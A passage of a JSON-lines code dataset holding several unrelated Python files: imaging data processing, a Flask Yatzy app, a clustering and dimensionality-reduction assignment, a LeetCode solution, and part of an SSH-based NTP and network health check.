np.histogram2d(coordinates[:, 0], coordinates[:, 1], bins=matrix, range=imageRange)[0]\n if self.processingParameters['returnEnergySpectum'] or self.processingParameters['returnEmissionDistribution']:\n output = [imageArray]\n if self.processingParameters['returnEnergySpectum']:\n energySpectrum = self._acquireEnergySpectrum(processedData)\n output.append(energySpectrum)\n if self.processingParameters['returnEmissionDistribution']:\n emissionCoordinates = processedData['Emission coordinates'][validEvents]\n DataProcessor.convertToLocalCoordinates(\n emissionCoordinates,\n data['Origin'],\n data['R'],\n data['Rotation center']\n )\n emissionDistrubution = self._obtainEmissionDistrubution(emissionCoordinates)\n output.append(emissionDistrubution)\n return output\n return imageArray\n\n def _convertToScattersImage(self, data):\n processedData = self.processData(data['Interactions data'], self.scattersImageParameters)\n matrix, imageRange = self._getMatrixAndImageRange(data, self.scattersImageParameters)\n coordinates = processedData['Coordinates']\n indicesOfPeak = (processedData['Energy transfer'] == self.scattersImageParameters['peakEnergy']).nonzero()[0]\n peakImageArray = np.histogram2d(coordinates[indicesOfPeak, 0], coordinates[indicesOfPeak, 1], bins=matrix, range=imageRange)[0]\n validEvents = self.cutToEnergyWindow(processedData['Energy transfer'], self.processingParameters['energyWindow'])\n generalImageArray = np.histogram2d(coordinates[validEvents, 0], coordinates[validEvents, 1], bins=matrix, range=imageRange)[0]\n nulls = generalImageArray == 0\n peakImageArray[nulls] = 1\n generalImageArray[nulls] = 1\n scattersImageArray = 1 - peakImageArray/generalImageArray\n return scattersImageArray\n\n @staticmethod\n def updateParameters(parameters, newParameters):\n for key, value in newParameters.items():\n if key in parameters:\n parameters[key] = value\n\n @staticmethod\n def cutToEnergyWindow(energyTransfer, energyWindow):\n return np.nonzero((energyTransfer >= energyWindow[0])*(energyTransfer <= energyWindow[1]))[0]\n\n @staticmethod\n def processData(interactions_data, processingParameters):\n dataProcessor = DataProcessor()\n interactions_data = deepcopy(interactions_data)\n dataProcessor.addEmissionROI(interactions_data, processingParameters['emissionROI'])\n dataProcessor.averageActs(interactions_data, processingParameters['decayTime'], processingParameters['useDistanceTraveled'])\n dataProcessor.addEnergyDeviation(interactions_data, processingParameters['energyResolution'], processingParameters['referenceEnergy'])\n dataProcessor.addCoordinatesDeviation(interactions_data, processingParameters['spatialResolution'])\n return interactions_data\n\n\nclass DataSaver:\n\n def __init__(self, data, fileName, dataType=None, pixelSize=0.6):\n self.data = np.asarray(data)\n self._fileName = fileName\n self.dataType = dataType\n self.pixelSize = pixelSize\n\n @property\n def fileName(self):\n if self.data.ndim > 2:\n return self._fileName.split('/')[0] + ('' if self.dataType is None else '_' + self.dataType)\n return self._fileName.split('/')[-1] + ('' if self.dataType is None else '_' + self.dataType)\n\n def saveAsNumpy(self, rot=False):\n print(f'Saving {self.fileName} as Numpy')\n data = self.data\n if rot:\n if self.data.ndim > 2:\n data = np.rot90(self.data, k=-1, axes=(1, 2))\n else:\n data = np.rot90(self.data, k=-1)\n np.save(f'Numpy data/{self.fileName}.npy', data)\n\n def saveAsDicom(self):\n print(f'Saving {self.fileName} as Dicom')\n if self.data.ndim > 2:\n data = np.rot90(self.data, k=-1, axes=(1, 2))\n data = data[:, ::-1]\n else:\n data = np.rot90(self.data, k=-1)\n data = data[::-1]\n data = data/self.data.max()*255\n data = data.astype(np.ubyte)\n image = sitk.GetImageFromArray(data, isVector=False)\n image.SetOrigin((0., 0., 0.))\n image.SetSpacing([self.pixelSize*10, self.pixelSize*10, 1])\n image.SetMetaData('0010|0010', self.fileName)\n sitk.WriteImage(image, f'DICOM data/{self.fileName}.dcm')\n\n def saveAsDat(self):\n print(f'Saving {self.fileName} as Dat')\n data = self.data\n if self.data.ndim > 2:\n from pathlib import Path\n Path(f'Dat data/{self.fileName}').mkdir(parents=True, exist_ok=True)\n for i, image in enumerate(data, 1):\n image = image[::-1]\n np.savetxt(f'Dat data/{self.fileName}/{i}.dat', image, fmt='%i', delimiter='\\t')\n else:\n data = data[::-1]\n np.savetxt(f'Dat data/{self.fileName}.dat', data, fmt='%i', delimiter='\\t')\n\n\nif __name__ == '__main__':\n fileName = 'efg3cutWA'\n angles = np.linspace(-np.pi/4, 3*np.pi/4, 32)\n angles = np.round(np.rad2deg(angles), 1)\n nameList = [f'Raw data/{fileName}/{angle} deg' for angle in angles]\n nameList = [name + '.hdf' for name in nameList]\n\n dataExtractor = DataExtractor()\n data = dataExtractor.extractData(nameList)\n\n dataConverter = DataConverter()\n\n output = dataConverter.convertToImage(data)\n images = [image for image, spectrum, distribution in output]\n energySpectrums = [spectrum for image, spectrum, distribution in output]\n distributions = np.asarray([distribution for image, spectrum, distribution in output])\n\n dataSaver = DataSaver(images, fileName)\n dataSaver.saveAsNumpy(rot=True)\n dataSaver.saveAsDicom()\n dataSaver.saveAsDat()\n \n dataSaver = DataSaver(energySpectrums, fileName, 'spectrums')\n dataSaver.saveAsNumpy()\n\n dataSaver = DataSaver(distributions, fileName, 'distributions')\n dataSaver.saveAsNumpy()\n\n scattersImages = dataConverter.convertToScattersImage(data)\n dataSaver = DataSaver(scattersImages, fileName, 'scatters')\n dataSaver.saveAsNumpy()\n dataSaver.saveAsDicom()\n dataSaver.saveAsDat()\n\n","repo_name":"GurkoMikhail/Analysing","sub_path":"rawDataProcessing.py","file_name":"rawDataProcessing.py","file_ext":"py","file_size_in_byte":17827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28658893122","text":"from flask import Flask, request\nfrom flask import render_template\nfrom flask import redirect\nimport csv\nimport shutil\nimport time\nimport sys\nimport pathlib\nimport os\n\n\ndef get_datadir() -> pathlib.Path:\n home = pathlib.Path.home()\n if sys.platform == \"win32\":\n return home / \"AppData/Roaming\"\n elif sys.platform == \"linux\":\n return home / \".local/share\"\n elif sys.platform == \"darwin\":\n return home / \"Library/Application Support\"\n\n\nmy_datadir = get_datadir() / \"yatzy\"\ntry:\n my_datadir.mkdir(parents=False)\nexcept FileExistsError:\n pass\ntry:\n f = open(os.path.join(my_datadir, 'Name.csv'), \"x\")\nexcept FileExistsError:\n pass\n\napp = Flask(\"yatzy\")\\\n\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef start():\n if request.method == \"POST\":\n players = [\"Spielername\"]\n spieler1 = request.form.get(\"Spieler1\")\n if spieler1 != \"\":\n players.append(spieler1)\n spieler2 = request.form.get(\"Spieler2\")\n if spieler2 != \"\":\n players.append(spieler2)\n spieler3 = request.form.get(\"Spieler3\")\n if spieler3 != \"\":\n players.append(spieler3)\n spieler4 = request.form.get(\"Spieler4\")\n if spieler4 != \"\":\n players.append(spieler4)\n spieler5 = request.form.get(\"Spieler5\")\n if spieler5 != \"\":\n players.append(spieler5)\n spieler6 = request.form.get(\"Spieler6\")\n if spieler6 != \"\":\n players.append(spieler6)\n spieler7 = request.form.get(\"Spieler7\")\n if spieler7 != \"\":\n players.append(spieler7)\n spieler8 = request.form.get(\"Spieler8\")\n if spieler8 != \"\":\n players.append(spieler8)\n print(players)\n original_stdout = sys.stdout\n namecsv = os.path.join(my_datadir, \"Name.csv\")\n with open(namecsv, 'w') as f0:\n sys.stdout = f0\n print(*players, sep=';')\n sys.stdout = original_stdout\n return redirect(\"/yatzy\", code=301)\n else:\n return render_template(\"start.html\")\n\n\n@app.route('/yatzy', methods=['GET', 'POST'])\ndef yatzy():\n players = []\n namecsv = os.path.join(my_datadir, \"Name.csv\")\n with open(namecsv, \"r\") as f1:\n reader = csv.reader(f1)\n for row in reader:\n row = str(row).replace('\\\\', '')\n players = row.split(\";\", 9)\n player_count = str(len(players) - 1)\n zeit = time.strftime('%Y-%m-%d-%Hh%M', time.localtime())\n filename = (zeit + \"-Sp-\" + player_count + \".csv\")\n destinationfile = os.path.join(my_datadir, filename)\n sourcefile = (\"templates/spielplan/\" + player_count + \"-Spieler.csv\")\n shutil.copy(namecsv, destinationfile, follow_symlinks=True)\n players = []\n rows = []\n with open(namecsv)as f2:\n csvreader = csv.reader(f2, delimiter=\";\")\n for player in csvreader:\n players.append(player)\n with open(destinationfile, \"a+\", encoding='utf-8-sig') as f3:\n with open(sourcefile, \"r\", encoding='utf-8-sig') as f4:\n f3.write(f4.read())\n with open(destinationfile) as f5:\n csvreader = csv.reader(f5, delimiter=\";\")\n header = next(csvreader)\n for row in csvreader:\n rows.append(row)\n if request.method == \"POST\":\n points1 = []\n points2 = []\n points3 = []\n points4 = []\n points5 = []\n points6 = []\n points7 = []\n points8 = []\n punktesp1 = request.form.get(\"pSp1[]\")\n if punktesp1 != \"\":\n points1.append(punktesp1)\n punktesp2 = request.form.get(\"pSp2[]\")\n if punktesp2 != \"\":\n points2.append(punktesp2)\n punktesp3 = request.form.get(\"pSp3[]\")\n if punktesp3 != \"\":\n points3.append(punktesp3)\n punktesp4 = request.form.get(\"pSp4[]\")\n if punktesp4 != \"\":\n points4.append(punktesp4)\n punktesp5 = request.form.get(\"pSp5[]\")\n if punktesp5 != \"\":\n points5.append(punktesp5)\n punktesp6 = request.form.get(\"pSp6[]\")\n if punktesp6 != \"\":\n points6.append(punktesp6)\n punktesp7 = request.form.get(\"pSp7[]\")\n if punktesp7 != \"\":\n points7.append(punktesp7)\n punktesp8 = request.form.get(\"pSp8[]\")\n if punktesp8 != \"\":\n points8.append(punktesp8)\n with open(destinationfile, 'r') as f6:\n d_reader = csv.DictReader(f6, delimiter=\";\")\n for line in d_reader:\n print(line)\n return render_template(\"index.html\", ergebnise=rows, titel=header, spieler=players)\n else:\n return render_template(\"index.html\", ergebnise=rows, titel=header, spieler=players)\n\n\n@app.route('/nav')\ndef nav():\n return render_template(\"navbar.html\")\n\n\n@app.route('/ranking')\ndef test2():\n rows = []\n with open(\"templates/spielplan/highscore.csv\") as h:\n csvreader = csv.reader(h, delimiter=\";\")\n header = next(csvreader)\n for row in csvreader:\n rows.append(row)\n return render_template(\"ranking.html\", titel=header, tabelle=rows)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=5000)\n","repo_name":"anirbas7/PRO2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"4272310762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 1 19:55:59 2019\r\n\r\n@author: Ray\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport preprocess\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.decomposition import FastICA\r\nfrom scipy.stats import kurtosis\r\n\r\nfrom sklearn.random_projection import GaussianRandomProjection\r\n\r\n# feature importance using ExtraTreesClassifier\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\n\r\n# neural network for accuracy comparison\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nseed = 50\r\n\r\ndef run_kmeans(data):\r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_pca_kmeans(data, principal_components = 1):\r\n clf = PCA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans and PCA: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_ica_kmeans(data, principal_components = 1):\r\n clf = FastICA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, 30):\r\n print(f'KMeans and ICA: with K = {i}')\r\n clf = KMeans(n_clusters = i, random_state = seed, precompute_distances = True)\r\n clf.fit(data)\r\n scores.append(clf.inertia_)\r\n \r\n return scores\r\n\r\ndef run_rp_kmeans(data, k = 1): \r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'KMeans and Random Projection: with num_components = {i}')\r\n clf_kmeans = KMeans(n_clusters = k, random_state = seed, precompute_distances = True)\r\n new_data = run_random_projection(data, num_components = i)\r\n clf_kmeans.fit(new_data)\r\n scores.append(clf_kmeans.inertia_)\r\n \r\n return scores\r\n \r\ndef run_EM(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0]) * 2):\r\n print(f'EM: with n_components = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_pca_EM(data, principal_components = 1):\r\n clf = PCA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, len(data[0]) * 2):\r\n print(f'EM and PCA: with K = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_ica_EM(data, principal_components = 1):\r\n clf = FastICA(n_components = principal_components)\r\n data = clf.fit_transform(data)\r\n \r\n scores = []\r\n for i in range(1, len(data[0]) * 2):\r\n print(f'EM and ICA: with K = {i}')\r\n clf = GaussianMixture(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_rp_EM(data, k = 1): \r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'EM and Random Projection: with num_components = {i}')\r\n clf_EM = GaussianMixture(n_components = k)\r\n new_data = run_random_projection(data, num_components = i)\r\n clf_EM.fit(new_data)\r\n scores.append(clf_EM.score(new_data))\r\n \r\n return scores\r\n\r\ndef run_pca(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'PCA: with n_components = {i}')\r\n clf = PCA(n_components = i)\r\n clf.fit(data)\r\n scores.append(clf.score(data))\r\n \r\n return scores\r\n\r\ndef run_ica(data):\r\n scores = []\r\n for i in range(1, len(data.iloc[0])):\r\n print(f'ICA: with n_components = {i}')\r\n clf = FastICA(n_components = i, random_state = seed)\r\n temp = clf.fit_transform(data)\r\n scores.append(kurtosis(temp, axis = None))\r\n \r\n return scores\r\n\r\ndef run_random_projection(data, num_components):\r\n clf = GaussianRandomProjection(n_components = num_components, random_state = seed)\r\n return clf.fit_transform(data)\r\n\r\n\r\ndef run_feature_importance(data, y, title):\r\n column_names = data.columns\r\n \r\n forest = ExtraTreesClassifier(n_estimators = 250, random_state = seed)\r\n forest.fit(data, y)\r\n \r\n importances = forest.feature_importances_\r\n std = np.std([tree.feature_importances_ for tree in forest.estimators_], axis=0)\r\n indices = np.argsort(importances)[::-1]\r\n \r\n # Print the feature ranking\r\n print(\"Feature ranking:\")\r\n \r\n for f in range(data.shape[1]):\r\n print(\"%d. feature %d (%f)\" % (f + 1, indices[f], importances[indices[f]]))\r\n \r\n # Plot the feature importances of the forest\r\n plt.figure()\r\n plt.title(title)\r\n plt.bar(range(data.shape[1]), importances[indices],\r\n color=\"r\", yerr=std[indices], align=\"center\")\r\n # plt.xticks(range(data.shape[1]), indices)\r\n plt.xticks(range(data.shape[1]), [column_names[index] for index in indices])\r\n plt.xlim([-1, data.shape[1]])\r\n plt.show()\r\n \r\n return [column_names[indices[i]] for i in range(0, 3)]\r\n\r\ndef run_nn(X, y):\r\n clf = MLPClassifier(solver = 'sgd', activation = 'relu', learning_rate = 'adaptive', hidden_layer_sizes = (2, 8), \r\n batch_size = 32, shuffle = True, early_stopping = True, max_iter = 1000, random_state = 1).fit(X, y)\r\n \r\n return clf.score(X, y)\r\n\r\ndef compute_neural_network(a, b):\r\n ### PCA\r\n ### ICA\r\n ### RP\r\n ### Feature Importance\r\n \r\n # dataset a\r\n clf = PCA(n_components = 3)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: PCA {run_nn(temp, a[1])}')\r\n \r\n clf = FastICA(n_components = 7, random_state = seed)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: ICA {run_nn(temp, a[1])}')\r\n \r\n clf = GaussianRandomProjection(n_components = 2, random_state = seed)\r\n temp = clf.fit_transform(a[0])\r\n print(f'Admissions Dataset: RP {run_nn(temp, a[1])}')\r\n \r\n important_features = ['CGPA', 'GRE Score', 'TOEFL Score']\r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = a[0][feature]\r\n \r\n temp = pd.DataFrame(temp_data)\r\n \r\n print(f'Admissions Dataset: Feature Importance {run_nn(temp, a[1])}')\r\n \r\n # dataset b\r\n ## 5 PCA, 7 ICA\r\n clf = PCA(n_components = 5)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset: PCA {run_nn(temp, b[1])}')\r\n \r\n clf = FastICA(n_components = 7, random_state = seed)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset: ICA {run_nn(temp, b[1])}')\r\n \r\n clf = GaussianRandomProjection(n_components = 2, random_state = seed)\r\n temp = clf.fit_transform(b[0])\r\n print(f'Income Dataset Dataset: RP {run_nn(temp, b[1])}')\r\n \r\n important_features = ['fnlwgt', 'age', 'education-num']\r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = b[0][feature]\r\n \r\n temp = pd.DataFrame(temp_data)\r\n \r\n print(f'Income Dataset: Feature Importance {run_nn(temp, b[1])}')\r\n\r\nif __name__ == \"__main__\":\r\n plt.style.use('seaborn-whitegrid')\r\n \r\n ######## Dataset 1 Preprocessing\r\n a = pd.read_csv('Admission_Predict.csv')\r\n for column in a.columns:\r\n indexNames = a[a[column] == ' ?'].index\r\n # Delete these row indexes from dataFrame\r\n a.drop(indexNames, inplace=True)\r\n a, a_y = preprocess.PreProcessAdmission(a.drop('Chance of Admit', axis = 1), a['Chance of Admit'])\r\n \r\n ######## Dataset 2 Preprocessing\r\n b = pd.read_csv('adult.test')\r\n for column in b.columns:\r\n indexNames = b[b[column] == ' ?'].index\r\n # Delete these row indexes from dataFrame\r\n b.drop(indexNames, inplace=True)\r\n b, b_y = preprocess.PreProcessIncome(b.drop('income', axis = 1), b['income'])\r\n\r\n dataset = [a, b]\r\n # Run the clustering algorithms on the datasets and describe what you see.\r\n ############################# K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_kmeans(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('K-Means for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('K-Means for Income Dataset')\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_EM(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('EM for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('EM for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n # Apply the dimensionality reduction algorithms to the two datasets and describe what you see.\r\n # Evaluation metric for PCA: Kaiser Criterion: use PCA with eigenvalues > 1\r\n ############################# PCA\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_pca(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('PCA for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('PCA for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 3 Principal Components for Admissions Dataset\r\n ### 5 Principal Components for Income Dataset\r\n ############################# PCA + K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_pca_kmeans(data, principal_components = 3)\r\n plt.title(\"PCA(3 PC's) and K-Means for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_kmeans(data, principal_components = 5)\r\n plt.title(\"PCA(5 PC's) and K-Means for Income Dataset\")\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 3 Principal Components for Admissions Dataset\r\n ### 5 Principal Components for Income Dataset\r\n ############################# PCA + EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_pca_EM(data, principal_components = 3)\r\n plt.title(\"PCA(3 PC's) and EM for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_EM(data, principal_components = 5)\r\n plt.title(\"PCA(5 PC's) and EM for Income Dataset\")\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# ICA\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_ica(data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('ICA for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('ICA for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Kurtosis Score')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 7 Principal Components for Admissions Dataset\r\n ### 7 Principal Components for Income Dataset\r\n ############################# ICA + K-Means\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_ica_kmeans(data, principal_components = 7)\r\n plt.title(\"ICA(7 Components) and K-Means for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_pca_kmeans(data, principal_components = 7)\r\n plt.title(\"ICA(7 Components) and K-Means for Income Dataset\")\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ### 7 Principal Components for Admissions Dataset\r\n ### 7 Principal Components for Income Dataset\r\n ############################# ICA + EM Algorithm\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n if i == 0:\r\n scores = run_ica_EM(data, principal_components = 7)\r\n plt.title(\"ICA(3 PC's) and EM for Admissions Dataset\")\r\n i += 1\r\n else:\r\n scores = run_ica_EM(data, principal_components = 7)\r\n plt.title(\"ICA(5 PC's) and EM for Income Dataset\")\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('Log-Likelihood loss')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# Randomized Projections\r\n i = 0\r\n for data in dataset:\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_rp_kmeans(data, k = 5)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('Randomized Projection for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('Randomized Projection for Income Dataset')\r\n plt.xlabel('Number of Components')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n ############################# Feature Importance (Feature Selection Algorithm of my Choice)\r\n i = 0\r\n for data in dataset:\r\n if i == 0:\r\n important_features = run_feature_importance(data, a_y, 'Feature Importance for Admissions Dataset')\r\n else:\r\n important_features = run_feature_importance(data, b_y, 'Feature Importance for Income Dataset')\r\n \r\n temp_data = dict()\r\n for feature in important_features:\r\n temp_data[feature] = data[feature]\r\n \r\n temp_data = pd.DataFrame(temp_data)\r\n fig_1 = plt.figure()\r\n ax_1 = plt.axes()\r\n scores = run_kmeans(temp_data)\r\n scores.insert(0, scores[0])\r\n if i == 0:\r\n plt.title('Feature Importance(Top 3) and K-Means for Admissions Dataset')\r\n i += 1\r\n else:\r\n plt.title('Feature Importance(Top 3) and K-Means for Income Dataset')\r\n plt.xlabel('K')\r\n plt.ylabel('WCSS')\r\n plt.plot(range(1, len(scores) + 1), scores)\r\n \r\n compute_neural_network((a, a_y), (b, b_y))\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"rliu245/OMSCS-CS7641","sub_path":"Unsupervised Learning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72565581314","text":"'''\n\nDescription:\n\nGiven a non-negative integer c, your task is to decide whether there're two integers a and b such that a2 + b2 = c.\n\n\n\nExample 1:\n\nInput: 5\nOutput: True\nExplanation: 1 * 1 + 2 * 2 = 5\n \n\nExample 2:\n\nInput: 3\nOutput: False\n\n'''\n\n\n\n'''\nSum of two squares theorem:\nAn integer greater than one can be written as a sum of two squares if and only if its prime decomposition contains no prime congruent to 3 modulo}4 raised to an odd power.\n'''\n\nfrom math import sqrt\n\nclass Solution:\n def judgeSquareSum(self, c: int) -> bool:\n \n # general form:\n # a^2 + b^2 == c where a <= b\n \n # c = (p1^q1) * (p2^q2) ... * (pk^qk)\n \n \n factor = 2\n \n # scan each prime factor\n while factor * factor <= c:\n \n exponent_of_factor = 0\n \n # check whether \" facotr | c \" or not\n if c % factor == 0:\n \n # get the exponent of current factor\n while c % factor == 0:\n \n # accumulate the exponenet of prime factor\n exponent_of_factor += 1\n \n # update c\n c = c // factor\n \n \n # Reject factor decomposition in the form: \" (4k+3)^q | c \", where q is odd integer\n if factor % 4 == 3 and exponent_of_factor % 2 != 0:\n return False\n \n # try next factor\n factor += 1\n \n # Reject number in the form: c = 4k+3 where k is non-negative integer\n return c % 4 != 3\n\n\n\n# n : the input value\n\n## Time Complexity: O( sqrt( n ) * log(n) )\n#\n# The overhead in time is the outer loop iterating on a <= b, which is of O( sqrt(n) ).\n# And the innter while loop iterating on c % factor == 0, which is of O( log(n) )\n\n## Space Complexity: O( 1 )\n#\n#\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the looping index and factpr, exponent_of_factor for computation, which is of O( 1 ).\n\n\n\n\ndef test_bench():\n\n test_data = [3, 5, 13, 25, 18, 28, 33]\n\n # expected output:\n '''\n False\n True\n True\n True\n True\n False\n False \n '''\n\n for number in test_data:\n\n print( Solution().judgeSquareSum(number) )\n \n return \n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0633_Sum of Square Numbers/sum_of_square_numbers_by_number_theorey.py","file_name":"sum_of_square_numbers_by_number_theorey.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"}
+{"seq_id":"11366567062","text":"import os\nimport re\n\nimport obspy\n\n\ndef check_serial(ssh, logger):\n ''' Get the MSS serial number.\n '''\n cmd = 'cat /home/mss/config/mss_serial'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n serial = ssh_stdout.readline().strip()\n\n return serial\n\n\ndef check_ntp(ssh, logger):\n ''' Check for a valid NTP connection.\n '''\n logger.info('Checking the NTP.')\n cmd = 'ntpq -np'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n response_list = ssh_stdout.readlines()\n response = \"\".join(response_list)\n \n working_server = []\n ntp_is_working = False\n\n if response.lower().startswith(\"no association id's returned\"):\n logger.error(\"NTP is not running. ntpd response:\\n %s\", response)\n else:\n # Search for the header line.\n header_token = \"===\\n\"\n header_end = response.find(header_token) + len(header_token)\n\n if not header_end:\n logger.error(\"NTP seems to be running, but no expected result was returned by ntpq: %s\", response)\n return []\n\n logger.info(\"NTP is running.\\n%s\", response)\n\n payload = response[header_end:]\n for cur_line in payload.splitlines():\n cur_data = re.split(' +', cur_line)\n if cur_line.startswith(\"*\") or cur_line.startswith(\"+\"):\n if (int(cur_data[4]) <= (int(cur_data[5]) * 2)) and (int(cur_data[6]) > 0):\n working_server.append(cur_data)\n\n if not working_server:\n logger.error(\"No working NTP servers found.\")\n else:\n ntp_is_working = True\n\n return ntp_is_working, response_list\n\n\ndef check_internet_conn(ssh, logger):\n ''' Check the connection to the internet.\n '''\n logger.info(\"Checking the connection to the internet.\")\n cmd = 'ping -c 1 mss.mertl-research.at'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = \"\".join(ssh_stdout.readlines()).strip()\n\n network_reachable = False\n\n if error_response or not response:\n logger.error(\"Error reaching mss.mertl-research.at using ping:\\n{:s}\".format(error_response))\n else:\n logger.info(\"Successfull ping to mss.mertl-research.at.\")\n network_reachable = True\n\n return network_reachable, response\n \n\ndef check_datalink(ssh, logger):\n ''' Check the connection to the datalink server.\n '''\n logger.info('Checking datalink connection.')\n\n datalink_connected = False\n\n cmd = 'ping -c 1 mss.mertl-research.at'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = \"\".join(ssh_stdout.readlines()).strip()\n\n if error_response or not response:\n logger.error(\"Error reaching mss.mertl-research.at using ping:\\n{:s}\".format(error_response))\n else:\n cmd = 'ss -natp'\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(cmd)\n error_response = \"\".join(ssh_stderr.readlines()).strip()\n response = ssh_stdout.readlines()\n logger.info(\"Output of ss -natp:\\n%s\", ''.join(response))\n\n if response:\n for cur_line in response:\n cur_line = cur_line.strip()\n cur_data = re.split(' +', cur_line)\n if (len(cur_data) == 6) and \\\n (cur_data[0].lower() == 'estab') and \\\n 